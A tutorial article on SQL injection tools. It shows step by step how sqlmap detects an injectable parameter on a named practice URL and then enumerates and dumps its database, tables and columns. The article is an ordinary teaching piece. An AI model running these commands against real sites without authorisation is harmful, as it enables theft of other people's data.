Web6: SQL Injection - Some Exploit Tools

There are many security scanning tools available today (including SQL injection). These tools allow the detection and exploitation of SQL injection vulnerabilities quite powerfully. Some commonly used automated SQL injection exploit tools include:

Sqlmap
The Mole (Digging up your data)
Havij

There are also some other tools that you can refer to such as: Netsparker, jSQL Injection, Burp, BBQSQL.

Below I am a demo of using Sqlmap to exploit basic SQL injection.

You download Sqlmap at here.

Sqlmap is written in Python language, so to use this tool you need to install Python. You can download python at http://www.python.org/downloads/

First you have to define the target website, here I have the following goal: http://zerocoolhf.altervista.org/level1.php?id=1 (this page is now dead).

Step 1 : Open cmd and type the following command:

python sqlmap.py –u 'http://zerocoolhf.altervista.org/level1.php?id=1'

Web6: SQL Injection - Some Exploit Tools Picture 1

sqlmap will detect the target's vulnerability and give information about the vulnerability.

Step 2 : Once it has been determined that the target website has an SQL injection vulnerability, we proceed to find the database name.

python sqlmap.py –u 'http://zerocoolhf.altervista.org/level1.php?id=1' --dbs

Web6: SQL Injection - Some Exploit Tools Picture 2

=> Database: my_zerocoolhf

Step 3 : After determining the database name, we will find the names of the tables in the database.

python sqlmap.py –u 'http://zerocoolhf.altervista.org/level1.php?id=1' --tables –D my_zerocoolhf

Web6: SQL Injection - Some Exploit Tools Picture 3

=> There are 2 tables in the database: auth and book

Step 4 : Identify the column names in the table

python sqlmap.py –u 'http://zerocoolhf.altervista.org/level1.php?id=1' --columns –D my_zerocoolhf –T book

Web6: SQL Injection - Some Exploit Tools Picture 4

=> Identify the columns in the book table: author, id, price, title.

Step 5 : Dump data from the table.

python sqlmap.py –u 'http://zerocoolhf.altervista.org/level1.php?id=1' --dump –D my_zerocoolhf –T book

Web6: SQL Injection - Some Exploit Tools Picture 5

=> Thus, we have obtained the database of the target website.

Above is a basic demo of using sqlmap to exploit SQL injection errors, you can learn more options of sqlmap here to support SQL injection exploitation.

Kareem Winters

Update 05 July 2022

You should read it

May be interested

Free VPN: Is There More?
if you're not willing to pay for a vpn, should you try a free provider or avoid vpn altogether?
Pros and cons of passwordless authentication
passwordless authentication verifies a person's identity through more secure options than a password or any other mnemonic.
What is DNS Amplification Attack?
dns amplification is a distributed denial of service (ddos) attack in which an attacker exploits vulnerabilities in dns (domain name system) servers to turn small initial queries into much larger payloads. used to 'take down' the victim's server.
Connecting over HTTPS is not necessarily safe
you may not have noticed, but most of the online web traffic in the world today is sent over an https connection, a protocol created with the aim of maximizing 'security'.
What is Teardrop attack?
in a teardrop denial of service (dos) attack, a client sends an incorrect packet of information to a machine and exploits an error that occurs when the packet is reassembled, resulting in a drop in server performance.
How to set up IKEv2 IPsec on Windows
today's article will guide you how to set up ikev2 ipsec on windows. this guide was created with the operating system windows 10.

Web6: SQL Injection - Some Exploit Tools

You should read it

May be interested

Computer security